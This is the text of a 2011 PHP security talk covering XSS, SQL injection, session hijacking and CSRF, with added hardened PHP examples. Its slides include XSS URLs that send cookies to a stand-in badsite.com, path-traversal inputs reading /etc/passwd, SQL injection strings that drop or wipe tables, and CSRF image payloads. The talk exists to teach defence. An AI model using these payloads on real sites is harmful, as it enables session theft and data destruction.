sydphp security in php
Security in PHP talk for SydPHP, Thursday 24th February, 2011
Security and PHP
February 2011
Allan Shone
Technical Yahoo!, Local Paranoid @Yahoo!7
Been at Yahoo!7 just under 3 years
Website Security
What is Security?
Why is Security important?
What can you do about it?
Types of issues
XSS
SQL Injection
Session Hijacking
CSRF
Phishing
Why XSS?
Lead to larger problems
Used to inject code into your site
Bad people ™ can steal user information
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00
http://sydphp.leetbix.com/template.php?load=../some-config.conf%00
POST too
What do I do?!
Filter
Simplest solution: htmlentities()
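As an added example (not code from the talk), the following is a hardened version of the kind of template.php?load=... endpoint the earlier slides abuse. It covers both problems those URLs demonstrate: reflected script in the load parameter, and the /etc/passwd%00 and ../some-config.conf%00 values that reach a file include. The template names, directory and helper names are assumptions. It escapes with htmlspecialchars(); htmlentities() as the slide suggests works the same way, just encoding more characters.

```php
<?php
// Added example, not the talk's code. Hardened template loader:
// allow-list the file to include, escape anything echoed back.
declare(strict_types=1);

// Only these names may ever be turned into a path. Building a path from
// raw input is what lets "../some-config.conf%00" or "/etc/passwd%00" in.
const ALLOWED_TEMPLATES = ['home', 'about', 'contact'];   // assumed names

function resolve_template(string $name): ?string
{
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        return null;                       // unknown name: refuse, never guess
    }
    return __DIR__ . '/templates/' . $name . '.php';   // assumed directory
}

// Output escaping for HTML body text and attribute values.
// ENT_QUOTES also encodes ' so the value is safe inside single-quoted attributes.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$load = $_GET['load'] ?? 'home';
if (!is_string($load)) {                   // ?load[]=x would arrive as an array
    $load = '';
}

$path = resolve_template($load);
if ($path === null) {
    http_response_code(404);
    // Echoing the rejected value is only acceptable because it is escaped:
    // <script>alert(0);</script> comes out as &lt;script&gt;alert(0);&lt;/script&gt;
    echo '<p>No such template: ' . e($load) . '</p>';
    exit;
}

require $path;
```

The allow-list is the part that actually closes the file-include hole; basename() or stripping "../" on its own leaves too many encodings to think about. Escaping happens at the point of output, once per value, with the charset stated explicitly.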
SQL what?
Arbitrary SQL code being executed
Bypass login, edit database content
Find passwords, hidden information
http://sydphp.leetbix.com/login.php
Password: ' OR 1=1 -- '
' OR 1=1; DROP TABLE users; -- '
' OR 1=1; UPDATE TABLE users SET password='' WHERE 1=1; -- '
Oh no!
http://xkcd.com/327/
escape
mysql_real_escape_string()
addslashes()
PDO
PDO::quote()
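As an added example (not the talk's code), here is the login lookup from the login.php slide written with PDO prepared statements, so that a password of ' OR 1=1 -- ' is bound as a plain string and never becomes part of the SQL. The DSN, credentials, table and column names are placeholders. password_verify() is a later addition to PHP than this 2011 talk and is used here only to show that the table should hold hashes rather than the passwords the slide says an injection can find.

```php
<?php
// Added example, not the talk's code: injection-proof login with PDO.
declare(strict_types=1);

function db(): PDO
{
    // DSN and credentials are placeholders.
    return new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app', 'secret', [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false,   // real server-side prepares
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

// Vulnerable shape the slide attacks (do NOT use):
//   "SELECT * FROM users WHERE name='$user' AND password='$pass'"
// With $pass = "' OR 1=1 -- '" the WHERE clause is always true.

function find_user(PDO $pdo, string $username): ?array
{
    // The value travels separately from the statement text, so quotes,
    // semicolons and "--" inside it have no SQL meaning.
    $stmt = $pdo->prepare('SELECT id, name, password_hash FROM users WHERE name = :name');
    $stmt->execute([':name' => $username]);
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

function login(PDO $pdo, string $username, string $password): bool
{
    $user = find_user($pdo, $username);
    // Compare against a stored hash, so a dumped users table yields no passwords.
    return $user !== null && password_verify($password, $user['password_hash']);
}
```

PDO::quote() and mysql_real_escape_string() escape a value you then splice into a string; prepared statements remove the splice altogether, which is why they are the first choice. Turning emulated prepares off makes the server, not the client library, do the separation.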
Session hijacking
Bad for users
Bad for data integrity
Easy to prevent
Not stand-alone
Cookies
Integrity checking
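As an added example (not code from the talk), this shows the three pieces the session-hijacking slides name: cookie settings that keep the session id out of JavaScript and off plain HTTP, a fresh id at login, and an integrity check that ties the session to the client that created it. Function names and the session keys are assumptions; the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example, not the talk's code: session hardening.
declare(strict_types=1);

function client_fingerprint(): string
{
    // Coarse binding only: the User-Agent changes on browser updates and is
    // forgeable, so this raises the bar rather than proving identity.
    // Do not bind to the client IP; mobile and corporate users change it often.
    return hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
}

function start_secure_session(): void
{
    ini_set('session.use_only_cookies', '1');   // never accept an id from the URL
    ini_set('session.use_strict_mode', '1');    // reject ids the server did not issue
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,      // sent over HTTPS only
        'httponly' => true,      // document.cookie (the XSS slide) cannot read it
        'samesite' => 'Lax',     // not attached to cross-site image/script loads
    ]);
    session_start();

    // Integrity check against the fingerprint recorded at creation.
    if (!isset($_SESSION['fp'])) {
        $_SESSION['fp'] = client_fingerprint();
    } elseif (!hash_equals($_SESSION['fp'], client_fingerprint())) {
        session_unset();
        session_destroy();
        http_response_code(403);
        exit('Session integrity check failed');
    }
}

function on_login(int $userId): void
{
    // Privilege change: issue a new id so a fixated or stolen pre-login id
    // is useless, and drop the old session file.
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
    $_SESSION['fp']      = client_fingerprint();
}
```

The slide's "Not stand-alone" point shows up here: the httponly flag is only worth something if the XSS problem is handled as well, and the regenerate-on-login step is what stops a session fixation from surviving authentication.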
CSRF? Sugar?
Cross-site request forgery
Simple, but un-common
<img src="http://othersite.com/changepasswd?new=onlyIKnow" />
<script>a=document.createElement('img');a.src='http://badsite../';document.firstChild.appendChild(a);a.src='http://badsite.com/otherpage';</script>
Integrity, integrity
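As an added example (not the talk's code), this is the integrity check the CSRF slides point to: a per-session synchronizer token that the change-password form carries and the handler verifies. A forged <img> or <script> request from another site cannot include the token, and because the handler only acts on POST, the GET in the slide's <img src="...changepasswd?new=..."> does nothing either. The form field, session key and file name are assumptions.

```php
<?php
// Added example, not the talk's code: synchronizer token against CSRF.
declare(strict_types=1);
session_start();

function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));   // 256 bits, CSPRNG
    }
    return $_SESSION['csrf'];
}

function csrf_field(): string
{
    return '<input type="hidden" name="csrf" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_check(): void
{
    $sent = $_POST['csrf'] ?? '';
    // hash_equals: constant-time compare, and also a type check.
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    csrf_check();                 // a cross-site <img>/<script> load never has the token
    // ... change the password for $_SESSION['user_id'] here (assumed key) ...
    echo 'Password changed';
    exit;
}
?>
<form method="post" action="changepasswd.php">
  <?= csrf_field() ?>
  <input type="password" name="new">
  <button>Change password</button>
</form>
```

The token must never be readable to another origin, which is why CSRF protection depends on the XSS fixes from earlier slides: script running in the page can simply read the hidden field.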
Phishing!
Same, but different?
But what can you do
PHP’s filter functions
filter_has_var
filter_id
filter_input_array
filter_input
filter_list
filter_var_array
filter_var
No more SuperGlobals
// Read the GET parameter through the filter extension; FILTER_SANITIZE_SPECIAL_CHARS
// HTML-encodes < > & ' " before the value ever reaches the page.
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
echo "<h3>No results found for '{$search}'.</h3>";
echo "<a href='?search=$search&page=2'>Next page</a>";
INPUT_GET
INPUT_POST
INPUT_COOKIE
INPUT_SERVER
INPUT_ENV
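As an added example (not code from the talk), this takes the filter_input example on the previous slide further: filter_input_array() validates a whole GET request at once, with validation filters for the typed fields and a raw read for the free-text search. It differs from the slide in one deliberate way, noted in the code: the search term is kept raw and escaped per output context, because a value HTML-encoded on input is wrong when it later lands in a URL query or a database query. Field names and ranges are assumptions.

```php
<?php
// Added example, not the talk's code: validate the whole request with
// filter_input_array, then escape for the context each value is used in.
declare(strict_types=1);

$spec = [
    'search' => FILTER_DEFAULT,                       // keep raw; escape on output
    'page'   => ['filter'  => FILTER_VALIDATE_INT,
                 'options' => ['min_range' => 1, 'max_range' => 1000]],
    'sort'   => ['filter'  => FILTER_VALIDATE_REGEXP,
                 'options' => ['regexp' => '/^(name|date)$/']],
    'email'  => FILTER_VALIDATE_EMAIL,
];

// Missing keys come back as null, failed validation as false; an empty
// query string yields null for the whole array, hence the ?? [].
$in = filter_input_array(INPUT_GET, $spec) ?? [];

$search = is_string($in['search'] ?? null) ? $in['search'] : '';
$page   = ($in['page'] ?? null) ?: 1;        // null (absent) or false (invalid): default
$sort   = ($in['sort'] ?? null) ?: 'name';

if (($in['email'] ?? null) === false) {      // present but not an address
    http_response_code(400);
    exit('Invalid email address');
}

// One escaper per context: HTML text/attribute vs. URL query component.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

echo '<h3>No results found for \'' . e($search) . '\'.</h3>';
// http_build_query percent-encodes each value; e() then makes the whole
// href safe as an attribute (its & becomes &amp;, which the browser decodes).
$next = '?' . http_build_query(['search' => $search, 'page' => $page + 1, 'sort' => $sort]);
echo '<a href="' . e($next) . '">Next page</a>';
```

Whichever filter is chosen, the check to add in review is that every value read this way is actually consumed in the context its filter was chosen for; FILTER_SANITIZE_SPECIAL_CHARS output is an HTML fragment, not a URL component or a SQL literal.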
Allan Shone - @cerealboy
Jared Mooring - @jadzor
Filter function filters: http://au2.php.net/manual/en/filter.filters.php